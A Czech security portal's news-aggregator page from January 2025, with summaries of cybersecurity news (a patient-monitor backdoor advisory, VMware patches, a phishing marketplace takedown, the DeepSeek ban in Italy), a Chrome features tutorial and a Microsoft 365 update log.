Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

CISA and FDA Warn of Critical Backdoor in Contec CMS8000 Patient Monitors

The Hacker News - 31 Leden, 2025 - 14:10
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have issued alerts about the presence of hidden functionality in Contec CMS8000 patient monitors and Epsimed MN-120 patient monitors. The vulnerability, tracked as CVE-2025-0626, carries a CVSS v4 score of 7.7 on a scale of 10.0. The flaw, alongside two other issues, was reported to CISA Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Takhle dvojitá kamera od Xiaomi vidí barevně i v noci a otočí se za zlodějem. Zrovna je ve slevě

Zive.cz - bezpečnost - 31 Leden, 2025 - 13:45
IP kamera Xiaomi Outdoor Camera CW500 Dual přišla na český trh teprve v prosinci a prodává se od 1890 Kč. HuraMobil ji až do neděle nabízí za 1796 Kč , pokud v košíku použijete slevový kód XIAOMI5VIKEND . Doprava je v ceně. Jde o outdoorový model s ochranou IP66 a provozními teplotami od −30 do ...
Kategorie: Hacking & Security

Police dismantles HeartSender cybercrime marketplace network

Bleeping Computer - 31 Leden, 2025 - 12:56
​Law enforcement authorities in the United States and the Netherlands have seized 39 domains and associated servers used by the HeartSender phishing gang operating out of Pakistan. [...]
Kategorie: Hacking & Security

Top 5 AI-Powered Social Engineering Attacks

The Hacker News - 31 Leden, 2025 - 12:15
Social engineering has long been an effective tactic because of how it focuses on human vulnerabilities. There’s no brute-force ‘spray and pray’ password guessing. No scouring systems for unpatched software. Instead, it simply relies on manipulating emotions such as trust, fear, and respect for authority, usually with the goal of gaining access to sensitive information or protected systems.
Kategorie: Hacking & Security

Top 5 AI-Powered Social Engineering Attacks

The Hacker News - 31 Leden, 2025 - 12:15
Social engineering has long been an effective tactic because of how it focuses on human vulnerabilities. There’s no brute-force ‘spray and pray’ password guessing. No scouring systems for unpatched software. Instead, it simply relies on manipulating emotions such as trust, fear, and respect for authority, usually with the goal of gaining access to sensitive information or protected systems. Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Italy Bans Chinese DeepSeek AI Over Data Privacy and Ethical Concerns

The Hacker News - 31 Leden, 2025 - 12:04
Italy's data protection watchdog has blocked Chinese artificial intelligence (AI) firm DeepSeek's service within the country, citing a lack of information on its use of users' personal data. The development comes days after the authority, the Garante, sent a series of questions to DeepSeek, asking about its data handling practices and where it obtained its training data. In particular, it wanted
Kategorie: Hacking & Security

Italy Bans Chinese DeepSeek AI Over Data Privacy and Ethical Concerns

The Hacker News - 31 Leden, 2025 - 12:04
Italy's data protection watchdog has blocked Chinese artificial intelligence (AI) firm DeepSeek's service within the country, citing a lack of information on its use of users' personal data. The development comes days after the authority, the Garante, sent a series of questions to DeepSeek, asking about its data handling practices and where it obtained its training data. In particular, it wantedRavie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

9 Google Chrome features you really should be using

Computerworld.com [Hacking News] - 31 Leden, 2025 - 12:00

If you’re like about 70% of computer users worldwide, you use Google’s Chrome browser as your gateway to the web, from conducting research and catching up on news to emailing and interacting with cloud apps. There are several tools built into Chrome that you might not know about, but should. They can improve your browsing experience significantly, enhancing productivity, organization, security, search, and more.

Even if you have already heard about some of these tools, consider this guide a refresher and encouragement to use them.

1. Chrome profiles: Keep work and personal browsing separate

You can add more than one user profile to Chrome. Each profile will have its own set of bookmarks, browsing history, website logins, and other data. For example, you can create one profile specifically for your work-related browsing, so that bookmarks and websites associated with your job are kept separate from your personal activity online.

To create another profile: Click your headshot or current profile icon that’s toward the upper right in Chrome. On the panel for your profile that opens, click Add new profile.

Click your profile icon, then select Add new profile.

Howard Wen / IDG

A large panel will open over the screen. You can create a new profile by signing in with another Google account. If this account already has Chrome profile data (bookmarks, browsing history, logins) associated with it, these will be synced to your PC.

You can sign into an existing Google account or create a profile that’s not connected to a Google account.

Howard Wen / IDG

Or you can select to create a new profile without signing in with another Google account. Browsing information that’s created in Chrome while using this new profile will be saved only on your PC.

Naming a new Chrome profile and choosing a color scheme.

Howard Wen / IDG

After you create the new profile, it’ll appear on the panel of your first profile. Click the name of this new profile; this will launch another instance of Chrome that will let you browse under that profile. You can run two (or more) instances of Chrome on your PC, each with a different user profile.

2. Password checkup: Review (and fix) your website logins

By default, Chrome automatically saves your usernames and passwords for websites that require a login in a service called Google Password Manager. If you don’t use a dedicated password manager app, GPM is a convenient tool for storing and managing login info. (See our separate guide to Google Password Manager.) It’s easy to “set and forget” passwords, so it’s a good idea to periodically check the health of your logins, updating usernames or passwords as needed.

Click the three-dot icon at Chrome’s upper right. On the menu that opens, select Passwords and autofill and then Google Password Manager. GPM will open in a new browser tab, where you’ll see the login information for the websites you’ve saved to GPM. You can click a website name to change or delete your username or password for it.

An important  feature to use is the Checkup tool. Along the left, click Checkup. Chrome will analyze all of your website passwords, rating which have weak security and notifying you if any have been compromised or if you’ve reused any across websites. You can click to see a list of the offending passwords, and the password manager’s interface will guide you through changing them.

Check for compromised, reused, or weak passwords, then change them as needed.

Howard Wen / IDG

If you’d like, you can use the password manager as a self-standing app on your PC. When Google Password Manager is open in a tab, click the Install Google Password Manager icon at the right end of the address bar. After it’s installed on your PC, you can click the desktop shortcut to launch Google Password Manager on its own, apart from Chrome.

3. Print to PDF: Turn a web page into a PDF

“Printing” a web page to a PDF can be useful for archiving the page as its contents appeared when you viewed it, or sharing a page when a web link to it won’t be convenient or possible for the person you want to share it with.

The fastest way to do this: With the web page open, hold the Ctrl key and type p on a Windows PC (or the Cmd key and p on a Mac). Alternatively, click the three-dot icon at the upper right of Chrome, and on the menu that opens, select Print.

A large panel opens. To the right of “Destination,” see if “Save as PDF” is listed inside the selection box. If it’s not, click this box to open a dropdown menu and select Save as PDF.

Set the Destination field to Save as PDF.

Howard Wen / IDG

The rest of this panel lists settings for formatting the PDF that you can change. (If you don’t see them, click More settings.) When you’ve set everything the way you want, click Save. You’ll be prompted to select a location on your PC’s storage where you want to save the PDF. Make your choice, and then Chrome will output the entire web page as a PDF and save it to your PC.

4. Reading list: Curate a list of web pages to read later

Chrome offers a nifty feature that lets you gather web pages that you want to remember to read later. The difference between saving a web page to Chrome’s reading list versus saving it as a bookmark is that the reading list is meant to motivate you, such as to read important information that you’re doing for research. You can chart your progress by marking a page as read when you’re finished with it.

With the web page open, click the three-dot icon at the upper right of Chrome. On the menu that opens along the right, click Bookmarks and lists and then select Reading list. Then click Add tab to reading list at the bottom of the panel. Repeat this process to add more web pages to the reading list.

To open your reading list, click the three-dot icon at the upper right, then select Bookmarks and lists > Reading list > Show reading list.The list will open in a panel on the right.

Gather web pages you want to read in\ Chrome’s reading list.

Howard Wen / IDG

On the reading list, clicking the title of a web page opens it in the browser tab to the left. When you’re finished reading it, move the pointer over the page’s title in the list and select the checkmark to mark the page as read or the x to remove it from the reading list.

5. Reading mode: Make lengthy content easier to read

You may come across an article that you want to concentrate on without other elements on the page’s layout (such as ads, images, videos, or sidebars) distracting you. Or maybe your eyesight is struggling with how the text appears on the page. Reading mode can help, and it works very well for reading long articles.

With the web page open, click the three-dot icon at the upper right, then select More tools > Reading mode. Chrome will extract the main article from the page and format it for easier reading in the reading mode panel that appears on the right.

Try reading mode for a distraction-free environment to read long articles.

Howard Wen / IDG

You can widen the reading mode panel by clicking-and-holding the double-bar icon on its left frame. Drag this icon toward the left, and the margins for the text in the reader mode panel will automatically adjust themselves.

Along the top of the reading mode panel is a toolbar that lets you adjust the text font and size, and the spacing between text characters and lines of text. You can also change the background color.

6. Tab groups: Organize and name tab collections

Chrome’s tab groups feature lets you organize tabs of related web pages into a collection that has a title. When you click the group title, all the web pages that you organized under it will open in the browser. This can be useful if you want to open multiple web pages that you frequently visit with a single click. You can create several different tab groups — say, one group for the core web apps you use every day for work, another for research related to a specific project, and so on.

To create a new tab group: At the left end of the Bookmarks toolbar, click the grid icon and select Create new tab group. Alternatively, click the three-dot icon at the upper right of Chrome, and on the menu that opens, select Tab groups > Create new tab group.

Or you can create a new tab group starting from an existing tab: Simply right-click the tab and select Add tab to group > New group from the menu that appears.

A special tab will open that prompts you to type in a name for your new tab group. You can optionally select a highlight color for the new tab group.

Creating a new tab group.

Howard Wen / IDG

Press the Enter key, and your new tab group will appear among the tabs in Chrome. If your Bookmarks toolbar is open, the group will also appear to the left of the grid icon.

To add a web page to a tab group: Simply drag a tab that’s already open in Chrome to the right of the tab group name and let it go.

Adding a tab to a group via drag-and-drop.

Howard Wen / IDG

To close the tabs in a tab group: Click the tab group name. The tabs that are opened to the right of it will close.

To open the tabs in a tab group: Click the tab group name, and the tabs that you organized under it will open to its right. Or, if you have the Bookmarks toolbar open, you can click the tab group name there or click the grid icon and select the group you want to open.

Navigating to a tab group via the Bookmarks toolbar.

Howard Wen / IDG

Finally, you can click the three-dot icon at the upper right of Chrome, then select Tab groups, the name of the tab group that you want, and Open group.

To manage a tab group: Right-click on the tab group name. On the menu that opens, you can click the following:

  • New tab in group: Opens a new, blank tab to the right of the tab group name. The web page you navigate to in this tab will be added to the tab group.
  • Move group to new window: Opens all the web pages organized in this group tab in a new browser window.
  • Ungroup: The web pages in this tab group will be opened, but the tab group (and its name) will be removed. This action essentially “frees” the web pages that you put into this tab group.
  • Close group: Closes a tab group, which removes it from the browser’s tabs toolbar. You can reopen a closed group via the Bookmarks toolbar or by selecting the three-dot icon and Chrome’s upper right, selecting Tab groups, and choosing the group you want.
  • Delete group: Deletes both the tab group name and all the web pages that you organized in it.

[ Related: 8 brilliant browser tab tricks for Windows power users ]

7. Google Lens: Search by image

Google Lens is a visual search feature built into Chrome. It lets you search for the source of an image on a web page, find variants of the image, or find or similar looking images. You can also use it to translate foreign words that appear in a photo or other image.

It can also be used to find an item for sale online. For example, if you have Google Lens search on a photo of a laptop, it might find an online store where you can buy it.

To use Google Lens in Chrome, right-click on a photo or image on a web page. On the menu that opens, select Search with Google Lens. A panel will open along the right of the browser, showing search results that you can browse through. You can click any result to open its web link in the browser.

Using Google Lens image search.

Howard Wen / IDG

In the main browser window that shows the image Google Lens searched on, you can fine-tune the image search in various ways:

  • Adjust the frame around the image by clicking-and-dragging its corners or sides. This may prompt Google Lens to provide more precise search results.
  • Draw a frame around a specific area of the image. Position the crosshair over the image, then click-and-drag it in any direction to frame the area of the image that you want Google Lens to analyze and search.
  • Translate text that’s in a language other than the one set as your browser’s default. Draw a frame around the text or double-click it to highlight it, then select Translate on the menu that opens. Google Lens will open a translation tool in the panel along the right.

Google Lens can translate text in an image.

Howard Wen / IDG

8. Share a web page: Send a link to another device

You’re viewing a web page on your PC but want to see it on your phone, tablet, or another PC. Here are two unique ways to forward a web page link to another device:

Method 1: Send the link to a signed-in device

First, you must be signed into Chrome with a Google account. The device you want to forward the link to also must be signed into Chrome with the same Google account.

With the web page open in Chrome on your PC, click the three-dot icon toward the upper right. On the menu that opens, select Cast, save, and share and then Send to your devices.

A menu pops open that lists any mobile device and other PCs that are signed in with your Google account. If you click the name of your smartphone on this menu, that device will receive a notification in Chrome. Tap this notification to open the web page.

Sending a web link to a signed-in device.

Howard Wen / IDG

Method 2: Create a QR code for the link

If the smartphone or other device that you want to forward the link to isn’t signed in to your Google account, you can create a QR code for the web page’s link.

With the web page open in Chrome on your PC, click the three-dot icon toward the upper right. On the menu that opens, select Cast, save, and share > Create QR code.

A QR code image will pop open below the web address bar.

Creating a QR code to send a link.

Howard Wen / IDG

Use the smartphone’s camera to capture it — most recent smartphone models will recognize a QR code. When you tap the link that appears, the web page will open in the smartphone’s default browser, whether it’s Chrome or another such as Firefox, Microsoft Edge, or Safari.

9. Translation: Manage the languages that Chrome translates

By default, Chrome offers to translate a web page if it’s not in your preferred native language. (If it doesn’t, click the Translate this page icon at the right end of the address bar or click the three-dot icon at the upper right and choose Translate.)

It’s worth taking the time to manage this feature so that it’s set best for your browsing, particularly if you frequently visit sites that are in languages other than your native one. Click the three-dot icon at the upper right of Chrome. On the menu that opens, scroll to the bottom and select Settings. The Settings page opens in a new tab. Along the left column, click Languages.

On the page that appears, scroll down to the Google Translate section. Here you can tell Chrome to automatically translate pages that are in certain languages without asking you first. You can also tell it not to offer to translate pages in some languages — useful for people who are fluent in more than one language. For languages that you don’t specify as “automatically translate” or “never offer to translate,” Chrome will continue to offer to translate the page.

Setting translation preferences in Chrome.

Howard Wen / IDG

Want more Chrome tips? See 8 great productivity tips for Chrome.

Kategorie: Hacking & Security

Google Bans 158,000 Malicious Android App Developer Accounts in 2024

The Hacker News - 31 Leden, 2025 - 11:45
Google said it blocked over 2.36 million policy-violating Android apps from being published to the Google Play app marketplace in 2024 and banned more than 158,000 bad developer accounts that attempted to publish such harmful apps. The tech giant also noted it prevented 1.3 million apps from getting excessive or unnecessary access to sensitive user data during the time period by working with
Kategorie: Hacking & Security

Google Bans 158,000 Malicious Android App Developer Accounts in 2024

The Hacker News - 31 Leden, 2025 - 11:45
Google said it blocked over 2.36 million policy-violating Android apps from being published to the Google Play app marketplace in 2024 and banned more than 158,000 bad developer accounts that attempted to publish such harmful apps. The tech giant also noted it prevented 1.3 million apps from getting excessive or unnecessary access to sensitive user data during the time period by working with Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Microsoft 365: A guide to the updates

Computerworld.com [Hacking News] - 31 Leden, 2025 - 11:30

Microsoft 365 (and Office 365) subscribers get more frequent software updates than those who have purchased Office without a subscription, which means subscribers have access to the latest features, security patches, and bug fixes. But it can be hard to keep track of the changes in each update and know when they’re available. We’re doing this for you, so you don’t have to.

Following are summaries of the updates to Microsoft 365/Office 365 for Windows over the past year, with the latest releases shown first. We’ll add info about new updates as they’re rolled out.

Note: This story covers updates released to the Current Channel for Microsoft 365/Office 365 subscriptions. If you’re a member of Microsoft’s Office Insider preview program or want to get a sneak peek at upcoming features, see the Microsoft 365 Insider blog.

Version 2501 (Build 18429.20132)

Release date: January 30, 2025

In this build, the advanced Track Changes option to set the margin for balloons in Word has been removed.

A wide variety of bugs have also been fixed, including one in which ActiveX controls used an excessive amount of GDI handles in PowerPoint, and another for the entire Office suite in which images couldn’t be pasted from SharePoint.

 Get more info about Version 2501 (Build 18429.20132).

Version 2412 (Build 18324.20194)

Release date: January 16, 2025

This build fixes one bug, in which apps would exit unexpectedly when running on Windows Server 2016.

Get more info about Version 2412 (Build 18324.20194).

Version 2412 (Build 18324.20190)

Release date: January 14, 2025

This build fixes a bug in Word in which the layout of tables were changed unexpectedly. It also includes a variety of security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2412 (Build 18324.20190).

Version 2412 (Build 18324.20168)

Release date: January 7, 2025

This build makes tables in Outlook more accessible for screen readers. It also fixes a wide variety of bugs, including one in Word in which a document saved to a network shared folder and set to “Always Open Read-Only” would open in “Editing” mode, and another for the entire Office suite in which application didn’t render the grid properly after switching from page break preview to normal view.

Get more info about Version 2412 (Build 18324.20168).

Version 2411 (Build 18227.20162)

Release date: December 10, 2024

This build fixes a bug in Word and Outlook where characters didn’t render correctly when using Save Selection to Text Box Gallery. It also includes a variety of security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2411 (Build 18227.20162).

Version 2411 (Build 18227.20152)

Release date: December 5, 2024

This build fixes a wide variety of bugs, including one in Excel in which some cells might not be rendered properly upon scrolling in a worksheet using freeze panes, one in Word which prevented emails with linked SVG content from saving or sending, and one in which some PowerPoint presentations created by third-party tools didn’t open correctly and some content was removed.

Get more info about Version 2411 (Build 18227.20152).

Version 2410 (Build 18129.20158)

Release date: November 12, 2024

This build fixes a variety of bugs, including one in Word in which all characters didn’t appear correctly when creating an Outlook task from OneNote, and one in PowerPoint in which embedded BMP images in the PowerPoint slide were not opening.

This build also includes a variety of security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2410 (Build 18129.20158).

Version 2410 (Build 18129.20116)

Release date: October 28, 2024

This build enables filtering capabilities for the comment pane in Excel and fixes a variety of bugs, including one in Word in which the title bar no longer showed a “Saved” status for locally saved files, and one in PowerPoint in which a graphics-related issue caused the app to close unexpectedly at times.

Get more info about Version 2410 (Build 18129.20116).

Version 2409 (Build 18025.20160)

Release date: October 15, 2024

This build fixes a single bug in Word, in which emails with linked SVG content couldn’t be saved or sent.

Get more info about Version 2409 (Build 18025.20160).

Version 2409 (Build 18025.20140)

Release date: October 8, 2024

This build fixes a variety of bugs, including one in Word in which text wasn’t clearly visible in High Contrast Mode when using “Draft with Copilot” and referencing a meeting under “Reference your content.”

This build also includes multiple security updates. See Release notes for Microsoft Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2409 (Build 18025.20140).

Version 2409 (Build 18025.20104)

Release date: September 25, 2024

This build fixes a single bug, in which when you saved a file in Word, the save status was missing from the Title bar.

Get more info about Version 2409 (Build 18025.20104).

Version 2409 (Build 18025.20096)

Release date: September 23, 2024

This build improves the user experience for selecting which users should have which permissions when a sensitivity label configured for user-defined permissions is applied to a file or when configuring standalone Information Rights Management through the Restrict Access feature. This change affects Excel, PowerPoint, and Word.

The build also fixes a variety of bugs, including one in Word in which Document Mode would switch from “editing” to “viewing” if user enabled “Track Changes” and set “For Everyone.”

Get more info about Version 2409 (Build 18025.20096).

Version 2408 (Build 17928.20156)

Release date: September 10, 2024

This update will remove Flip video support when the service goes offline on October 1, 2024. The build also includes a variety of security updates. Go here for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2408 (Build 17928.20156).

Version 2408 (Build 17928.20114)

Release date: August 26, 2024

This build allows you to disable connected experiences for privacy concerns without impacting data security policies, such as sensitivity labels. Services associated with Microsoft Purview (e.g., sensitivity labels and rights management) are no longer controlled by policy settings to manage privacy controls for Microsoft 365 Apps. Instead, these services will rely on their existing security admin controls in Purview portals.

The build also fixes a variety of bugs, including one in Outlook that caused default SMIME labels to fail to apply when a user replied to or forwarded an unlabeled message, and one for the entire suite in which people couldn’t install Microsoft 365 apps on an enrolled device.

Get more info about Version 2408 (Build 17928.20114).

Version 2407 (Build 17830.20166)

Release date: August 13, 2024

This build includes a variety of security updates for Excel, Outlook, PowerPoint, Project, Visio, and the entire Office suite. See Microsoft’s Release notes for Office security updates for details.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2407 (Build 17830.20166).

Version 2407 (Build 17830.20138)

Release date: August 1, 2024

This build fixes a wide variety of bugs, including one in which coauthoring on text boxes in Excel sometimes gave unexpected results, another in PowerPoint in which line widths were not preserved when exporting arrow shapes to PDF, and another in Word in which revisions were sometimes skipped when reviewing using VBA.

Get more info about Version 2407 (Build 17830.20138).

Version 2406 (Build 17726.20160)

Release date: July 9, 2024

This build fixes several bugs, including one in Word and Excel in which characters don’t appear correctly in Text Box Gallery. It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2406 (Build 17726.20160).

Version 2406 (Build 17726.20126)

Release date: June 26, 2024

This build fixes a wide variety of bugs, including one in which Excel documents might be unexpectedly edited when a mandatory sensitivity label has not been applied, one that caused Outlook to exit unexpectedly shortly after launch for some users, and one in which pasting data from Word or Excel to an Outlook template as a link would cause an error message to appear.

Get more info about Version 2406 (Build 17726.20126).

Version 2405 (Build 17628.20164)

Release date: June 19, 2024

This build includes a variety of unspecified bug and performance fixes.

Get more info about Version 2405 (Build 17628.20164).

Version 2405 (Build 17628.20144)

Release date: June 11, 2024

This build fixes one bug, which prevented users from sending mail for a few hours after updating add-ins with on-send events. It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2405 (Build 17628.20144).

Version 2405 (Build 17628.20110)

Release date: May 30, 2024

This build fixes a wide variety of bugs, including one in Excel in which an embedded workbook in .xls format might not have closed properly, one that that caused Outlook to close when using Copilot Summarize, one in Word in which content controls may have been removed when coauthoring, and one for the entire Office suite in which the Organization Chart Add-In for Microsoft programs was not loading properly.

Get more info about Version 2405 (Build 17628.20110).

Version 2404 (Build 17531.20152)

Release date: May 14, 2024

This build fixes a number of bugs, including one in Word where content controls might be removed when coauthoring, and one that caused Sovereign users to be unable to create ToDo tasks from Outlook.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2404 (Build 17531.20152).

Version 2404 (Build 17531.20140)

Release date: May 7, 2024

This build fixes two bugs in Outlook, one in which it closed unexpectedly using the Scheduling Assistant when creating a new meeting or viewing an existing meeting, and another that caused add-in developers to hit timeouts when retrieving notifications from an Outlook client context.

Get more info about Version 2404 (Build 17531.20140) .

Version 2404 (Build 17531.20120)

Release date: April 29, 2024

This build reduces workbook size bloat from unnecessary cell formatting with a new “Check Performance” task pane. In addition, it fixes a wide variety of bugs, including one in Excel in which the default font could not be set; one in Outlook in which custom forms from MAPI form servers stopped responding; one in PowerPoint in which online videos did not play in some cases; one in which when opening certain Word documents would cause the error, “Word experienced an error trying to open the file”; and one in which the Office update installer appeared to be unresponsive.

Get more info about Version 2404 (Build 17531.20120) .

Version 2403 (Build 17425.20176)

Release date: April 9, 2024

This build fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2403 (Build 17425.20176).

Version 2402 (Build 17328.20184)

Release date: March 12, 2024

This build fixes three bugs: one in which Access closed unexpectedly, one in which Excel closed unexpectedly when opening files with pivot tables and table design in macro-enabled files, and one in which Word closed unexpectedly when the undo function was used.

This build also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2402 (Build 17328.20184).

Version 2402 (Build 17328.20162)

Release date: March 4, 2024

This build fixes several bugs, including one that crashed Outlook when a link was clicked on, and another for the entire Office suite in which opened Office apps didn’t automatically start when a laptop was reopened, and an error message appeared after manual relaunch.

Get more info about Version 2402 (Build 17328.20162).

Version 2402 (Build 17328.20142)

Release date: February 28, 2024

This build fixes a variety of bugs, including one that caused Outlook to exit unexpectedly when expanding a conversation in the search results from a search of “All Mailboxes,” and another in which users were not able to create a bullet list with hyphens in PowerPoint.

Get more info about Version 2402 (Build 17328.20142).

Version 2401 (Build 17231.20236)

Release date: February 13, 2024

This build fixes several bugs, including one in which macros were being corrupted when saving Excel files and another that affected the entire Office suite in which add-ins would not load after Click trust for content add-in was selected.

This build also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2401 (Build 17231.20236).

Version 2401 (Build 17231.20194)

Release date: February 1, 2024

This build fixes a single bug in which expanded groups in the message list collapsed when users changed which column they were arranged by.

Get more info about Version 2401 (Build 17231.20194).

Version 2401 (Build 17231.20182)

Release date: January 30, 2024

This build fixes a wide variety of bugs, including one in which Excel would stop responding when saving changes, one in PowerPoint in which Notes and Slide layout would open with incorrect proportions when a file was opened from a protected view, and one in Word in which comment cards appeared too wide and cut off text when changing or switching the screen in use.

Get more info about Version 2401 (Build 17231.20182).

Version 2312 (Build 17126.20132)

Release date: January 9, 2024

This build fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2312 (Build 17126.20132).

Version 2312 (Build 17126.20126)

Release date: January 4, 2023

This build introduces a new sensitivity toolbar in Word, Excel, and PowerPoint that helps users understand the security policies that apply to their documents. It’s available when users are creating copies of their documents in File / Save As. In addition, Office now had a new default theme, which Microsoft says is “more modern and accessible.”

It also fixes a wide variety of bugs, including one in Excel in which Custom Menu text was truncated when right-clicking in a cell, one in PowerPoint in which restoring a previous version of a presentation was not working as expected when using Version History, and one in Word in which the content control end tag was marked at the end of the document automatically if the document was edited in Word Online and then opened in Word desktop.

Get more info about  Version 2312 (Build 17126.20126).

Version 2311 (Build 17029.20108)

Release date: December 12, 2023

This build fixes one bug in Outlook, in which the message list was blank when switching between the “Focused” and “Other” views.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2311 (Build 17029.20108).

Version 2311 (Build 17029.20068)

Release date: November 29, 2023

This build automatically inserts image captioning for Excel’s images. When you insert an image into a spreadsheet, accessibility image captioning is automatically generated for you.

It also fixes a wide variety of bugs, including one in Excel in which list box controls would not respond to mouse clicks after scrolling using the mouse wheel, and one in Word in which the language of a presentation was not retained when saving or exporting the presentation to a PDF file.

Get more info about Version 2311 (Build 17029.20068).

Version 2310 (Build 16924.20150)

Release date: November 14, 2023

This build fixes several bugs, including one in which Outlook failed to comply with the default browser settings for some users, and another in which new lines were added to an Outlook signature when pressing Enter in the body of the email.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2310 (Build 16924.20150).

Version 2310 (Build 16924.20124)

Release date: Oct. 31, 2023

This build fixes a bug that caused Outlook to exit unexpectedly when clicking the More link in the Search results list.

Get more info about Version 2310 (Build 16924.20124).

Version 2310 (Build 16924.20106)

Release date: Oct. 25, 2023

In this build, the Teams Meeting App works in Outlook, too. With it, you’ll be able to configure a meeting app while scheduling an invite in Outlook. The meeting app will be ready to use when you chat or join the meeting on Teams.

A wide variety of bugs have also been fixed, including one in Excel where certain Pivot Tables would load slowly; one in which OneNote would close unexpectedly when rapidly navigating from one .PDF file to another .PDF file between different sections, or when performing an undo operation on a .PDF printout insertion; and one in the entire Office suite that caused unexpected black borders to appear around screen captures added with the Insert Screenshot functionality.

Get more info about Version 2310 (Build 16924.20106).

Version 2309 (Build 16827.20166)

Release date: October 10, 2023

This build fixes two bugs, one in which users were missing their Outlook add-ins, and another in Word in which subheading numbering with a custom Style would disappear if the file was saved and reopened. It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2309 (Build 16827.20166).

Version 2309 (Build 16827.20130)

Release date: September 28, 2023

This build introduces two new features, including the ability to disable specific types of automatic data conversions in Excel and support for the “Present in Teams” button to present local files in PowerPoint Live in Microsoft Teams.

Several bugs have also been fixed, including one in which the setting to control how Outlook opens previous items at start-up was missing from the Options window, and another in Word in which the Add-ins tab was not visible when using custom toolbar information.

Get more info about Version 2309 (Build 16827.20130).

Version 2308 (Build 16731.20234)

Release date: September 12, 2023

This build fixes several bugs, including one that caused Outlook to close unexpectedly when viewing an email, and another in PowerPoint in which the presenter view slide section zoomed in and out when zooming in the notes section.

It also fixes a number of security holes. For details, see Release notes for Microsoft Office security updates.

What IT needs to know: Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.

Get more info about Version 2308 (Build 16731.20234).

Kategorie: Hacking & Security

Google loni výrazně vyztužil bezpečnost Androidů. U 1,3 milionu aplikací omezil přístup k citlivým datům

Zive.cz - bezpečnost - 31 Leden, 2025 - 08:15
** Google vydal bezpečnostní souhrn Androidu za loňský rok ** ** Eliminoval velký počet škodlivých aplikací i jejich vývojáře ** Omezení zafungovala, jak na Google Play, tak i při sideloadingu
Kategorie: Hacking & Security

Broadcom Patches VMware Aria Flaws – Exploits May Lead to Credential Theft

The Hacker News - 31 Leden, 2025 - 06:49
Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning customers that attackers could exploit them to gain elevated access or obtain sensitive information. The list of identified flaws, which impact versions 8.x of the software, is below - CVE-2025-22218 (CVSS score: 8.5) - A malicious actor with View Only Admin
Kategorie: Hacking & Security

Broadcom Patches VMware Aria Flaws – Exploits May Lead to Credential Theft

The Hacker News - 31 Leden, 2025 - 06:49
Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning customers that attackers could exploit them to gain elevated access or obtain sensitive information. The list of identified flaws, which impact versions 8.x of the software, is below - CVE-2025-22218 (CVSS score: 8.5) - A malicious actor with View Only AdminRavie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

KuCoin to pay nearly $300 million in penalties after guilty plea

Bleeping Computer - 31 Leden, 2025 - 01:18
KuCoin's operator, PEKEN Global Limited, pleaded guilty to operating an unlicensed money-transmitting business and agreed to pay $297 million in penalties to settle charges in the U.S. [...]
Kategorie: Hacking & Security

